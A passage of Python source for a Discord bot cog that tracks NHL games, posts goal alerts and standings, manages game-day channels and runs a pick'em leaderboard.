self.session = aiohttp.ClientSession(loop=self.bot.loop)
default_global = {"teams": [], "created_gdc": False, "print": False}
for team in TEAMS:
team_entry = TeamEntry("Null", team, 0, [], {}, [], "")
default_global["teams"].append(team_entry.to_json())
default_global["teams"].append(team_entry.to_json())
default_guild = {
"standings_channel": None,
"standings_type": None,
"post_standings": False,
"standings_msg": None,
"create_channels": False,
"category": None,
"gdc_team": None,
"gdc": [],
"delete_gdc": True,
"rules": "",
"team_rules": "",
"pickems": [],
"leaderboard": {},
}
default_channel = {"team": [], "to_delete": False}
self.config = Config.get_conf(self, CONFIG_ID)
self.config.register_global(**default_global, force_registration=True)
self.config.register_guild(**default_guild)
self.config.register_channel(**default_channel)
self.loop = bot.loop.create_task(self.game_check_loop())
self.TEST_LOOP = False # used to test a continuous loop of a single game data
##############################################################################
# Here is all the logic for gathering game data and updating information
async def game_check_loop(self):
"""
This loop grabs the current games for the day
then passes off to other functions as necessary
"""
await self.bot.wait_until_ready()
while self is self.bot.get_cog("Hockey"):
# await self.refactor_data()
async with self.session.get(BASE_URL + "/api/v1/schedule") as resp:
data = await resp.json()
if data["dates"] != []:
games = [
game["link"]
for game in data["dates"][0]["games"]
if game["status"]["abstractGameState"] != "Final"
]
else:
games = []
# Only try to create game day channels if there's no games for the day
# Otherwise make the game day channels once we see
# the first preview message to delete old ones
await self.check_new_day()
games_playing = False
if self.TEST_LOOP:
games = [1]
while games != []:
to_remove = []
games_playing = True
for link in games:
if not self.TEST_LOOP:
try:
async with self.session.get(BASE_URL + link) as resp:
data = await resp.json()
except Exception as e:
log.error(_("Error grabbing game data: "), exc_info=True)
continue
else:
games_playing = False
with open(str(__file__)[:-9] + "testgame.json", "r") as infile:
data = json.loads(infile.read())
game = await Game.from_json(data)
try:
await self.check_new_day()
await game.check_game_state(self.bot)
except Exception as e:
log.error("Error checking game state: ", exc_info=True)
log.debug(
(
f"{game.away_team} @ {game.home_team} "
f"{game.game_state} {game.away_score} - {game.home_score}"
)
)
if game.game_state == "Final" and game.first_star is not None:
try:
await Pickems.set_guild_pickem_winner(self.bot, game)
except Exception as e:
log.error(_("Pickems Set Winner error: "), exc_info=True)
to_remove.append(link)
for link in to_remove:
games.remove(link)
await asyncio.sleep(60)
log.debug(_("Games Done Playing"))
try:
await Pickems.tally_leaderboard(self.bot)
except Exception as e:
log.error(_("Error tallying leaderboard:"), exc_info=True)
pass
if games_playing:
await self.config.created_gdc.set(False)
# Final cleanup of config incase something went wrong
# Should be mostly unnecessary at this point
all_teams = await self.config.teams()
for team in await self.config.teams():
all_teams.remove(team)
team["goal_id"] = {}
team["game_state"] = "Null"
team["game_start"] = ""
team["period"] = 0
all_teams.append(team)
await self.config.teams.set(all_teams)
await asyncio.sleep(300)
async def check_new_day(self):
if not await self.config.created_gdc():
if datetime.now().weekday() == 6:
try:
await Pickems.reset_weekly(self.bot)
except Exception as e:
log.error(_("Error reseting the weekly leaderboard: "), exc_info=True)
try:
await Standings.post_automatic_standings(self.bot)
except Exception as e:
log.error("Error updating standings", exc_info=True)
log.debug(_("Checking GDC"))
await GameDayChannels.check_new_gdc(self.bot)
await self.config.created_gdc.set(True)
async def on_raw_reaction_add(self, payload):
channel = self.bot.get_channel(id=payload.channel_id)
try:
guild = channel.guild
except:
return
pickems_list = await self.config.guild(guild).pickems()
if pickems_list is None:
return
pickems = [Pickems.from_json(p) for p in pickems_list]
if len(pickems) == 0:
return
try:
msg = await channel.get_message(id=payload.message_id)
except:
return
user = guild.get_member(payload.user_id)
# log.debug(payload.user_id)
if user.bot:
return
is_pickems_vote = False
for pickem in pickems:
if msg.id in pickem.message:
is_pickems_vote = True
reply_message = ""
try:
# log.debug(payload.emoji)
pickem.add_vote(user.id, payload.emoji)
except UserHasVotedError as team:
if msg.channel.permissions_for(msg.guild.me).manage_messages:
emoji = (
pickem.home_emoji
if str(payload.emoji.id) in pickem.away_emoji
else pickem.away_emoji
)
await msg.remove_reaction(emoji, user)
reply_message = _("You have already voted! Changing vote to) ") + str(team)
except VotingHasEndedError as error_msg:
if msg.channel.permissions_for(msg.guild.me).manage_messages:
await msg.remove_reaction(payload.emoji, user)
reply_message = _("Voting has ended!") + str(error_msg)
except NotAValidTeamError:
if msg.channel.permissions_for(msg.guild.me).manage_messages:
await msg.remove_reaction(payload.emoji, user)
reply_message = _("Don't clutter the voting message with emojis!")
if reply_message != "":
try:
await user.send(reply_message)
except:
pass
if is_pickems_vote:
pickems_list = [p.to_json() for p in pickems]
await self.config.guild(guild).pickems.set(pickems_list)
async def change_custom_emojis(self, attachments):
"""
This overwrites the emojis in constants.py
with values in a properly formatted .yaml file
"""
try:
async with self.session.get(attachments[0].url) as infile:
data = yaml.safe_load(await infile.read())
except yaml.error.YAMLError as exc:
raise InvalidFileError("Error Parsing the YAML") from exc
new_dict = {}
for team in TEAMS:
TEAMS[team]["emoji"] = data[team][0] if data[team][0] is not None else data["Other"][0]
team_data = json.dumps(TEAMS, indent=4, sort_keys=True, separators=(",", " : "))
constants_string = (
f'BASE_URL = "{BASE_URL}"\n'
f'HEADSHOT_URL = "{HEADSHOT_URL}"\n'
f"CONFIG_ID = {CONFIG_ID}\n"
f"TEAMS = {team_data}"
)
with open(__file__[:-9] + "constants.py", "w") as outfile:
outfile.write(constants_string)
async def wait_for_file(self, ctx):
"""
Waits for the author to upload a file
"""
msg = None
while msg is None:
check = lambda m: m.author == ctx.message.author and m.attachments != []
try:
msg = await self.bot.wait_for("message", check=check, timeout=60)
except asyncio.TimeoutError:
await ctx.send(_("Emoji changing cancelled"))
break
if msg.content.lower().strip() == "exit":
await ctx.send(_("Emoji changing cancelled"))
break
return msg
##############################################################################
# Here are all the bot commands
@commands.group(name="hockey", aliases=["nhl"])
async def hockey_commands(self, ctx):
"""
Get information from NHL.com
"""
pass
@commands.group(name="hockeyset", aliases=["nhlset"])
@commands.guild_only()
@checks.mod_or_permissions(manage_channels=True)
async def hockeyset_commands(self, ctx):
"""
Setup commands for the server
"""
if ctx.invoked_subcommand is None:
guild = ctx.message.guild
standings_channel = guild.get_channel(
await self.config.guild(guild).standings_channel()
)
post_standings = (
_("On") if await self.config.guild(guild).post_standings() else _("Off")
)
gdc_channels = await self.config.guild(guild).gdc()
if standings_channel is not None:
if ctx.channel.permissions_for(guild.me).embed_links:
standings_chn = standings_channel.mention
else:
standings_chn = standings_channel.name
try:
standings_msg = await standings_channel.get_message(
await self.config.guild(guild).standings_msg()
)
except discord.errors.NotFound:
standings_msg = None
pass
if standings_msg is not None:
if ctx.channel.permissions_for(guild.me).embed_links:
standings_msg = (
_("[Standings") + f" {post_standings}]({standings_msg.jump_url})"
)
else:
standings_msg = (
_("Standings") + f" {post_standings}```{standings_msg.jump_url}"
)
else:
standings_chn = "None"
standings_msg = "None"
channels = ""
for channel in await self.config.all_channels():
chn = guild.get_channel(channel)
if chn is not None:
teams = ", ".join(t for t in await self.config.channel(chn).team())
is_gdc = "(GDC)" if chn.id in gdc_channels else ""
if ctx.channel.permissions_for(guild.me).embed_links:
channels += f"{chn.mention}{is_gdc}: {teams}\n"
else:
channels += f"#{chn.name}{is_gdc}: {teams}\n"
if ctx.channel.permissions_for(guild.me).embed_links:
em = discord.Embed(title=guild.name + _(" Hockey Settings"))
em.colour = await self.bot.db.color()
em.description = channels
em.add_field(
name=_("Standings Settings"), value=f"{standings_chn}: {standings_msg}"
)
await ctx.send(embed=em)
else:
msg = (
f"```\n{guild.name} "
+ _("Hockey Settings\n")
+ f"{channels}\n"
+ _("Standings Settings")
+ "\n#{standings_chn}: {standings_msg}"
)
if standings_msg is not None:
await ctx.send(msg)
else:
await ctx.send(msg + "```")
@commands.group()
@checks.mod_or_permissions(manage_channels=True)
@commands.guild_only()
async def gdc(self, ctx):
"""
Game Day Channel setup for the server
You can setup only a single team or all teams for the server
Game day channels are deleted and created on the day after the game is played
usually around 9AM PST
"""
if ctx.invoked_subcommand is None:
guild = ctx.message.guild
create_channels = await self.config.guild(guild).create_channels()
if create_channels is None:
return
team = await self.config.guild(guild).gdc_team()
if team is None:
team = "None"
channels = await self.config.guild(guild).gdc()
category = self.bot.get_channel(await self.config.guild(guild).category())
delete_gdc = await self.config.guild(guild).delete_gdc()
if category is not None:
category = category.name
if channels is not None:
created_channels = ""
for channel in channels:
chn = self.bot.get_channel(channel)
if chn is not None:
if ctx.channel.permissions_for(guild.me).embed_links:
created_channels += chn.mention
else:
created_channels += "#" + chn.name
else:
created_channels += "<#{}>\n".format(channel)
if len(channels) == 0:
created_channels = "None"
else:
created_channels = "None"
if not ctx.channel.permissions_for(guild.me).embed_links:
msg = (
_("```GDC settings for")
+ guild.name
+ "\n"
+ _("Create Game Day Channels:")
+ create_channels
+ "\n"
+ _("Delete Game Day Channels: ")
+ delete_gdc
+ "\n"
+ _("Team:")
+ team
+ "\n"
+ _("Current Channels:")
+ created_channels
+ "```"
)
await ctx.send(msg)
if ctx.channel.permissions_for(guild.me).embed_links:
em = discord.Embed(title=_("GDC settings for ") + guild.name)
em.colour = await self.bot.db.color()
em.add_field(name=_("Create Game Day Channels"), value=str(create_channels))
em.add_field(name=_("Delete Game Day Channels"), value=str(delete_gdc))
em.add_field(name=_("Team"), value=str(team))
em.add_field(name=_("Current Channels"), value=created_channels)
await ctx.send(embed=em)
#######################################################################
# All Game Day Channel Commands
@gdc.command(name="delete")
async def gdc_delete(self, ctx):
"""
Delete all current game day channels for the server
"""
if await self.config.guild(ctx.guild).create_channels():
await GameDayChannels.delete_gdc(self.bot, ctx.guild)
await ctx.send(_("Game day channels deleted."))
@gdc.command(name="create")
async def gdc_create(self, ctx):
"""
Creates the next gdc for the server
"""
if await self.config.guild(ctx.guild).create_channels():
await GameDayChannels.create_gdc(self.bot, ctx.guild)
await ctx.send(_("Game day channels created."))
@gdc.command(name="toggle")
async def gdc_toggle(self, ctx):
"""
Toggles the game day channel creation on this server
"""
guild = ctx.message.guild
cur_setting = not await self.config.guild(guild).create_channels()
verb = _("will") if cur_setting else _("won't")
msg = _("Game day channels ") + verb + _(" be created on this server.")
await self.config.guild(guild).create_channels.set(cur_setting)
await ctx.send(msg)
@gdc.command(name="category")
async def gdc_category(self, ctx, category: discord.CategoryChannel):
"""
Change the category for channel creation. Channel is case sensitive.
"""
guild = ctx.message.guild
cur_setting = await self.config.guild(guild).category()
msg = _("Game day channels will be created in ")
await self.config.guild(guild).category.set(category.id)
await ctx.send(msg + category.name)
@gdc.command(name="autodelete")
async def gdc_autodelete(self, ctx):
"""
Toggle's auto deletion of game day channels.
"""
guild = ctx.message.guild
cur_setting = await self.config.guild(guild).delete_gdc()
verb = _("won't") if cur_setting else _("will")
msg = (
_("Game day channels ")
+ verb
+ _(" be deleted on this server.\n")
+ _("Note, this may not happen until the next set of games.")
)
await self.config.guild(guild).delete_gdc.set(not cur_setting)
await ctx.send(msg)
@gdc.command(name="setup")
async def gdc_setup(
self,
ctx,
team: HockeyTeams,
category: discord.CategoryChannel = None,
delete_gdc: bool = True,
):
"""
Setup game day channels for a single team or all teams
Required parameters:
`team` must use quotes if a space is in the name will search for partial team name
Optional Parameters:
`category` must use quotes if a space is in the name will default to current category
`delete_gdc` will tell the bot whether or not to delete game day channels automatically
must be either `True` or `False` and a category must be provided
"""
guild = ctx.message.guild
if guild is None:
await ctx.send("This needs to be done in a server.")
return
if category is None:
category = guild.get_channel(ctx.message.channel.category_id)
if not category.permissions_for(guild.me).manage_channels:
await ctx.send(_("I don't have manage channels permission!"))
return
await self.config.guild(guild).category.set(category.id)
await self.config.guild(guild).gdc_team.set(team)
await self.config.guild(guild).delete_gdc.set(delete_gdc)
if team.lower() != "all":
await GameDayChannels.create_gdc(self.bot, guild)
else:
game_list = await Game.get_games()
for game in game_list:
await GameDayChannels.create_gdc(self.bot, guild, game)
await ctx.send(_("Game Day Channels for ") + team + _("setup in ") + category.name)
#######################################################################
# All Hockey setup commands
@hockeyset_commands.command()
@checks.admin_or_permissions(administrator=True)
async def reset(self, ctx):
"""
Restarts the hockey loop incase there are issues with the posts
"""
msg = await ctx.send(_("Restarting..."))
self.loop.cancel()
await msg.edit(content=msg.content + _("loop closed..."))
self.loop = self.bot.loop.create_task(self.game_check_loop())
await msg.edit(content=msg.content + _("restarted"))
# await ctx.send("Done.")
@hockeyset_commands.command(hidden=True)
async def leaderboardset(
self, ctx, user: discord.Member, season: int, weekly: int = None, total: int = None
):
"""
Allows moderators to set a users points on the leaderboard
"""
if weekly is None:
weekly = season
if total is None:
total = season
leaderboard = await self.config.guild(ctx.guild).leaderboard()
if leaderboard == {} or leaderboard is None:
await ctx.send(_("There is no current leaderboard for this server!"))
return
if str(user.id) not in leaderboard:
leaderboard[str(user.id)] = {"season": season, "weekly": weekly, "total": total}
else:
del leaderboard[str(user.id)]
leaderboard[str(user.id)] = {"season": season, "weekly": weekly, "total": total}
await self.config.guild(ctx.guild).leaderboard.set(leaderboard)
msg = (
user.display_name
+ _(" now has ")
+ season
+ _(" points on the season, ")
+ weekly
+ _(" points for the week,")
+ _(" and ")
+ total
+ _(" votes overall.")
)
await ctx.send(msg)
@hockeyset_commands.command(name="poststandings", aliases=["poststanding"])
async def post_standings(self, ctx, standings_type: str, channel: discord.TextChannel = None):
"""
Posts automatic standings when all games for the day are done
`standings_type` can be a division, conference, team, or all
`channel` will default to the current channel or be specified
"""
guild = ctx.message.guild
if channel is None:
channel = ctx.message.channel
standings_list = [
"metropolitan",
"atlantic",
"pacific",
"central",
"eastern",
"western",
"all",
]
division = ["metropolitan", "atlantic", "pacific", "central"]
if standings_type.lower() not in standings_list:
await ctx.send(
_("You must choose from ") + "{}".format(", ".join(s for s in standings_list))
)
return
standings, page = await Standings.get_team_standings(standings_type.lower())
if standings_type.lower() != "all":
em = await Standings.build_standing_embed(standings, page)
else:
em = await Standings.all_standing_embed(standings, page)
await self.config.guild(guild).standings_type.set(standings_type)
await self.config.guild(guild).standings_channel.set(channel.id)
await ctx.send(_("Sending standings to") + channel.mention)
message = await channel.send(embed=em)
await self.config.guild(guild).standings_msg.set(message.id)
await ctx.send(
standings_type
+ _(" standings will now be automatically updated in ")
+ channel.mention
)
await self.config.guild(guild).post_standings.set(True)
@hockeyset_commands.command()
async def togglestandings(self, ctx):
"""
Toggles automatic standings updates
This updates at the same time as the game day channels (usually 9AM PST)
"""
guild = ctx.message.guild
cur_state = not await self.config.guild(guild).post_standings()
verb = _("will") if cur_state else _("won't")
msg = _("Okay, standings ") + verb + _("be updated automatically.")
await self.config.guild(guild).post_standings.set(cur_state)
await ctx.send(msg)
@hockeyset_commands.command(name="add", aliases=["add_goals"])
async def add_goals(self, ctx, team: HockeyTeams, channel: discord.TextChannel = None):
"""
Adds a hockey team goal updates to a channel do 'all' for all teams
`team` needs to be all or part of an NHL team if more than one team
match it will ask for the correct team.
`channel` defaults to the current channel
"""
guild = ctx.message.guild
# team_data = await self.get_team(team)
if channel is None:
channel = ctx.message.channel
if not channel.permissions_for(guild.me).embed_links:
await ctx.send(_("I don't have embed links permission!"))
return
cur_teams = await self.config.channel(channel).team()
cur_teams = [] if cur_teams is None else cur_teams
if team in cur_teams:
await self.config.channel(channel).team.set([team])
else:
cur_teams.append(team)
await self.config.channel(channel).team.set(cur_teams)
await ctx.send(team + _(" goals will be posted in ") + channel.mention)
@hockeyset_commands.command(name="del", aliases=["remove", "rem"])
async def remove_goals(
self, ctx, team: HockeyTeams = None, channel: discord.TextChannel = None
):
"""
Removes a teams goal updates from a channel
defaults to the current channel
"""
if channel is None:
channel = ctx.message.channel
cur_teams = await self.config.channel(channel).team()
if cur_teams is None:
await ctx.send(_("no teams are currently being posted in ") + channel.mention)
return
if team is None:
await self.config.channel(channel).clear()
await ctx.send(_("All goal updates will not be posted in ") + channel.mention)
return
if team is not None:
guild = ctx.message.guild
if team in cur_teams:
cur_teams.remove(team)
if cur_teams == []:
await self.config.channel(channel).clear()
await ctx.send(_("All goal updates will not be posted in ") + channel.mention)
else:
await self.config.channel(channel).team.set(cur_teams)
await ctx.send(team + _(" goal updates removed from ") + channel.mention)
#######################################################################
# All Basic Hockey Commands
@hockey_commands.command()
async def version(self, ctx):
"""
Display the current version
"""
await ctx.send(_("Hockey version ") + __version__)
@commands.command()
async def hockeyhub(self, ctx, *, search: str):
"""
Search for hockey related items on https://hockeyhub.github.io/
lines team Team lines on Daily Faceoff
stats [year] team Team stats on nhl.com, year optional
schedule team Team schedule on nhl.com
draft team oryear Draft history for team or year on Elite Prospects
cap team orplayer Cap information for team or player on CapFriendly
player player Search for player on Elite Prospects
depth team Team depth chart on Elite Prospects
prospects team Team prospects on Elite Prospects
trades team Team trade history on NHL Trade Tracker
jersey [team] number orname Find a player by jersey number
highlights [team] Game Highlights, team optional
reddit team Team subreddit on Reddit
"""
search = quote(search)
await ctx.send("https://hockeyhub.github.io/?search=" + search)
@hockey_commands.command(name="role")
async def team_role(self, ctx, *, team: HockeyTeams):
"""Set your role to a team role"""
guild = ctx.message.guild
if not guild.me.guild_permissions.manage_roles:
return
try:
role = [
role
for role in guild.roles
if (team.lower() in role.name.lower() and "GOAL" not in role.name)
]
await ctx.author.add_roles(role[0])
await ctx.send(role[0].name + _("role applied."))
except Exception as e:
log.error("error adding team role", exc_info=True)
await ctx.send(team + _(" is not an available role!"))
@hockey_commands.command(name="goals")
async def team_goals(self, ctx, *, team: HockeyTeams = None):
"""Subscribe to goal notifications"""
guild = ctx.message.guild
member = ctx.message.author
if not guild.me.guild_permissions.manage_roles:
return
if team is None:
team_roles = []
for role in guild.roles:
if role.name in [r.name + " GOAL" for r in member.roles]:
team_roles.append(role)
if team_roles != []:
for role in team_roles:
await ctx.message.author.add_roles(role)
role_list = ", ".join(r.name for r in team_roles)
await ctx.message.channel.send(f"{role_list} role applied.")
return
else:
return
else:
try:
role = [
role
for role in guild.roles
if (team.lower() in role.name.lower() and role.name.endswith("GOAL"))
]
await ctx.message.author.add_roles(role[0])
await ctx.message.channel.send(role[0].name + _(" role applied."))
except Exception as e:
await ctx.message.channel.send(team + _(" is not an available role!"))
@hockey_commands.command()
async def standings(self, ctx, *, search: HockeyStandings = None):
"""
Displays current standings
If a search is provided you can see a teams complete stats
by searching for team or get all standings at once
separated by division
"""
if search is None:
standings, page = await Standings.get_team_standings("division")
await hockey_menu(ctx, "standings", standings)
return
standings, page = await Standings.get_team_standings(search.lower())
if search != "all":
await hockey_menu(ctx, "standings", standings, None, page)
else:
await hockey_menu(ctx, "all", standings, None, page)
@hockey_commands.command(aliases=["score"])
async def games(self, ctx, *, team: HockeyTeams = None):
"""
Gets all NHL games for the current season
If team is provided it will grab that teams schedule
"""
games_list = []
page_num = 0
today = datetime.now()
start_date = datetime.strptime(f"{get_season()[0]}-9-1", "%Y-%m-%d")
games_list = await Game.get_games_list(team, start_date)
for game in games_list:
game_time = datetime.strptime(game["gameDate"], "%Y-%m-%dT%H:%M:%SZ")
if game_time >= today:
page_num = games_list.index(game)
break
if games_list != []:
await hockey_menu(ctx, "game", games_list, None, page_num)
else:
await ctx.message.channel.send(team + _(" have no recent or upcoming games!"))
@hockey_commands.command(aliases=["player"])
async def players(self, ctx, *, search):
"""
Search for a player or get a team roster
"""
rosters = {}
players = []
teams = [team for team in TEAMS if search.lower() in team.lower()]
if teams != []:
for team in teams:
url = f"{BASE_URL}/api/v1/teams/{TEAMS[team]["id"]}/roster"
async with self.session.get(url) as resp:
data = await resp.json()
for player in data["roster"]:
players.append(player)
else:
for team in TEAMS:
url = f"{BASE_URL}/api/v1/teams/{TEAMS[team]["id"]}/roster"
async with self.session.get(url) as resp:
data = await resp.json()
try:
rosters[team] = data["roster"]
except KeyError:
pass
for team in rosters:
for player in rosters[team]:
if search.lower() in player["person"]["fullName"].lower():
players.append(player)
if players != []:
await hockey_menu(ctx, "roster", players)
else:
await ctx.send(search + _(" is not an NHL team or Player!"))
@hockey_commands.command(hidden=True)
@checks.mod_or_permissions(manage_messages=True)
async def rules(self, ctx):
"""
Display a nice embed of server specific rules
"""
if not ctx.channel.permissions_for(ctx.guild.me).embed_links:
return
rules = await self.config.guild(ctx.guild).rules()
team = await self.config.guild(ctx.guild).team_rules()
if rules == "":
return
em = await make_rules_embed(ctx.guild, team, rules)
if ctx.channel.permissions_for(ctx.guild.me).manage_messages:
await ctx.message.delete()
await ctx.send(embed=em)
@hockey_commands.command(hidden=True)
@checks.admin_or_permissions(manage_messages=True)
async def pickems_page(self, ctx, date: str = None):
"""
Generates a pickems page for voting on a specified day must be "DD-MM-YYYY"
"""
if date is None:
date = datetime.now()
else:
date = datetime.strptime(date, "%d-%m-%Y")
msg = _(
"**Welcome to our daily Pick'ems challenge! Below you will see today's games!"
" Vote for who you think will win! You get one point for each correct prediction."
" We will be tracking points over the course of the season and will be rewarding weekly,"
" worst and full-season winners!**\n\n"
"- Click the reaction for the team you think will win the day's match-up.\n"
"- Anyone who votes for both teams will have their vote removed and will receive no points!\n\n\n\n"
)
games_list = await Game.get_games(None, date, date)
await ctx.send(msg)
for game in games_list:
new_msg = await ctx.send(
"__**{} {}**__ @ __**{} {}**__".format(
game.away_emoji, game.away_team, game.home_emoji, game.home_team
)
)
# Create new pickems object for the game
await Pickems.create_pickem_object(ctx.guild, new_msg, ctx.channel, game)
if ctx.channel.permissions_for(ctx.guild.me).add_reactions:
try:
await new_msg.add_reaction(game.away_emoji[2:-1])
await new_msg.add_reaction(game.home_emoji[2:-1])
except Exception as e:
log.debug("Error adding reactions")
async def post_leaderboard(self, ctx, leaderboard_type):
"""
Posts the leaderboard based on specific style
"""
leaderboard = await self.config.guild(ctx.guild).leaderboard()
if leaderboard == {} or leaderboard is None:
await ctx.send(_("There is no current leaderboard for this server!"))
return
if leaderboard_type != "worst":
leaderboard = sorted(
leaderboard.items(), key=lambda i: i[1][leaderboard_type], reverse=True
)
else:
leaderboard = sorted(
leaderboard.items(), key=lambda i: i[1]["total"] - i[1]["season"], reverse=True
)
msg_list = []
count = 1
user_position = None
for member_id in leaderboard:
if str(member_id[0]) == str(ctx.author.id):
user_position = leaderboard.index(member_id)
member = ctx.guild.get_member(int(member_id[0]))
if member is None:
member_mention = _("User has left the server ") + member_id[0]
else:
member_mention = member.mention
if leaderboard_type == "weekly":
points = member_id[1]["weekly"]
msg_list.append("#{}. {}: {}\n".format(count, member_mention, points))
elif leaderboard_type == "season":
total = member_id[1]["total"]
wins = member_id[1]["season"]
percent = (wins / total) * 100
msg_list.append(
f"#{count}. {member_mention}: {wins}/{total} correct ({percent:.4}%)\n"
)
else:
total = member_id[1]["total"]
losses = member_id[1]["total"] - member_id[1]["season"]
percent = (losses / total) * 100
msg_list.append(
f"#{count}. {member_mention}: {losses}/{total} incorrect ({percent:.4}%)\n"
)
count += 1
leaderboard_list = [msg_list[i : i + 10] for i in range(0, len(msg_list), 10)]
if user_position is not None:
user = leaderboard[user_position][1]
wins = user["season"]
total = user["total"]
losses = user["total"] - user["season"]
position = (
ctx.author.display_name
+ _(", you're #")
+ str(user_position + 1)
+ " on the "
+ leaderboard_type
+ _(" leaderboard!")
)
if leaderboard_type == "season":
percent = (wins / total) * 100
position += (
_(" You have ") + f"{wins}/{total} " + _("correct ") + f"({percent:.4}%)."
)
elif leaderboard_type == "worst":
percent = (losses / total) * 100
position += (
_(" You have ") + f"{losses}/{total} " + _("incorrect ") + f"({percent:.4}%)."
)
await ctx.send(position)
await hockey_menu(ctx, leaderboard_type, leaderboard_list)
@hockey_commands.command()
@commands.guild_only()
async def leaderboard(self, ctx, leaderboard_type: str = "seasonal"):
"""
Shows the current server leaderboard either seasonal or weekly
"""
if leaderboard_type in ["seasonal", "season"]:
await self.post_leaderboard(ctx, "season")
if leaderboard_type in ["weekly", "week"]:
await self.post_leaderboard(ctx, "weekly")
if leaderboard_type in ["worst"]:
await self.post_leaderboard(ctx, "worst")
@hockey_commands.command(hidden=True)
@checks.mod_or_permissions(manage_messages=True)
async def setrules(self, ctx, team: HockeyTeams, *, rules):
"""Set the main rules page for the nhl rules command"""
if not ctx.channel.permissions_for(ctx.guild.me).embed_links:
await ctx.send(_("I don't have embed links permission!"))
return
await self.config.guild(ctx.guild).rules.set(rules)
await self.config.guild(ctx.guild).team_rules.set(team)
em = await make_rules_embed(ctx.guild, team, rules)
await ctx.send(_("Done, here's how it will look."), embed=em)
@hockey_commands.command(aliases=["link", "invite"])
async def otherdiscords(self, ctx, team: HockeyTeams):
"""
Get team specific discord links
choosing all will create a nicely formatted list of
all current NHL team discord server links
"""
if team not in ["all"]:
await ctx.send(TEAMS[team]["invite"])
else:
if not ctx.channel.permissions_for(ctx.message.author).manage_messages:
# Don't need everyone spamming this command
return
atlantic = [team for team in TEAMS if TEAMS[team]["division"] == "Atlantic"]
metropolitan = [team for team in TEAMS if TEAMS[team]["division"] == "Metropolitan"]
central = [team for team in TEAMS if TEAMS[team]["division"] == "Central"]
pacific = [team for team in TEAMS if TEAMS[team]["division"] == "Pacific"]
team_list = {
"Atlantic": atlantic,
"Metropolitan": metropolitan,
"Central": central,
"Pacific": pacific,
}
msg1 = _(
"__**Hockey Discord Master List**__\n```fix\n"
"- Do not join other discords to troll.\n- "
"Respect their rules & their members (Yes even the leafs & habs unfortunately).\n- "
"We don't control the servers below. If you get banned we can not get you unbanned.\n- "
"Don't be an asshole because then we all look like assholes. They won't see it as one asshole "
"fan they will see it as a toxic fanbase.\n- Salt levels may vary. Your team is the best "
"here but don't go on another discord and preach it to an angry mob after we just won.\n- "
"Not following the above rules will result in appropriate punishments ranging from a warning"
"to a ban. ```\n\nhttps://discord.gg/reddithockey"
)
eastern_conference = "https://i.imgur.com/CtXvcCs.png"
western_conference = "https://i.imgur.com/UFYJTDF.png"
async with self.session.get(eastern_conference) as resp:
data = await resp.read()
logo = BytesIO()
logo.write(data)
logo.seek(0)
image = discord.File(logo, filename="eastern_logo.png")
await ctx.send(msg1, file=image)
for division in team_list:
if division == "Central":
async with self.session.get(western_conference) as resp:
data = await resp.read()
logo = BytesIO()
logo.write(data)
logo.seek(0)
image = discord.File(logo, filename="western_logo.png")
await ctx.send(file=image)
div_emoji = "<:" + TEAMS["Team {}".format(division)]["emoji"] + ">"
msg = "{0} __**{1} DIVISION**__ {0}".format(div_emoji, division.upper())
await ctx.send(msg)
for team in team_list[division]:
team_emoji = "<:" + TEAMS[team]["emoji"] + ">"
team_link = TEAMS[team]["invite"]
msg = "{0} {1} {0}".format(team_emoji, team_link)
await ctx.send(msg)
@hockey_commands.command()
@checks.is_owner()
async def getgoals(self, ctx):
"""
Testing function with testgame.json
"""
to_remove = []
games_playing = True
# log.debug(link)
with open("/mnt/e/github/Trusty-cogs/hockey/testgame.json", "r") as infile:
data = json.loads(infile.read())
# log.debug(data)
game = await Game.from_json(data)
await game.check_game_state(self.bot)
if (game.home_score + game.away_score) != 0:
await game.check_team_goals(self.bot)
all_teams = await self.config.teams()
for team in await self.config.teams():
if team["team_name"] in [game.home_team, game.away_team]:
all_teams.remove(team)
team["goal_id"] = {}
team["game_state"] = "Null"
team["game_start"] = ""
team["period"] = 0
all_teams.append(team)
await self.config.teams.set(all_teams)
await ctx.send("Done testing.")
@hockeyset_commands.command(hidden=True)
@checks.is_owner()
async def pickems_tally(self, ctx):
"""
Manually tally the leaderboard
"""
await Pickems.tally_leaderboard(self.bot)
await ctx.send(_("Leaderboard tallying complete."))
@hockeyset_commands.command(hidden=True)
@checks.is_owner()
async def check_pickem_winner(self, ctx, days: int = 1):
"""
Manually check all pickems objects for winners
`days` number of days to look back
"""
days = days + 1
now = datetime.now()
for i in range(1, days):
delta = timedelta(days=-i)
check_day = now + delta
games = await Game.get_games(None, check_day, check_day)
for game in games:
await Pickems.set_guild_pickem_winner(self.bot, game)
await ctx.send(_("Pickems winners set."))
@gdc.command(hidden=True, name="test")
@checks.is_owner()
async def test_gdc(self, ctx):
"""
Test checking for new game day channels
"""
await GameDayChannels.check_new_gdc(self.bot)
@hockeyset_commands.command()
@checks.is_owner()
async def teststandings(self, ctx):
"""
Test the automatic standings function/manually update standings
"""
try:
await Standings.post_automatic_standings(self.bot)
except Exception as e:
log.debug("error testing standings page", exc_info=True)
@hockeyset_commands.command()
@checks.is_owner()
async def cogstats(self, ctx):
"""
Display current number of servers and channels
the cog is storing in console
"""
all_channels = await self.config.all_channels()
all_guilds = await self.config.all_guilds()
guild_list = {}
for channels in all_channels.keys():
channel = self.bot.get_channel(channels)
if channel is None:
log.debug(channels)
continue
if channel.guild.name not in guild_list:
guild_list[channel.guild.name] = 1
else:
guild_list[channel.guild.name] += 1
msg = "Servers:{}\nNumber of Channels: {}\nNumber of Servers: {}".format(
guild_list, len(all_channels), len(all_guilds)
)
log.debug(msg)
#######################################################################
# Owner Only Commands Mostly for Testing
@hockeyset_commands.command()
@checks.is_owner()
async def customemoji(self, ctx):
"""
Set custom emojis for the bot to use
Requires you to upload a .yaml file with
emojis that the bot can see
an example may be found [here](https://github.com/TrustyJAID/Trusty-cogs/blob/V3/hockey/emoji.yaml)
if no emoji is provided for a team the Other
slot will be filled instead
It's recommended to have an emoji for every team
to utilize all features of the cog such as pickems
"""
attachments = ctx.message.attachments
if attachments == []:
await ctx.send(_("Upload the .yaml file to use. Type `exit` to cancel."))
msg = await self.wait_for_file(ctx)
if msg is None:
return
try:
await self.change_custom_emojis(msg.attachments)
except InvalidFileError:
await ctx.send(_("That file doesn't seem to be formatted correctly."))
return
else:
try:
await self.change_custom_emojis(attachments)
except InvalidFileError:
await ctx.send(_("That file doesn't seem to be formatted correctly."))
return
new_msg = "".join(("<:" + TEAMS[e]["emoji"] + ">") for e in TEAMS)
await ctx.send(_("New emojis set to: ") + new_msg)
await ctx.send("You should reload the cog for everything to work correctly.")
@hockeyset_commands.command()
@checks.is_owner()
async def resetgames(self, ctx):
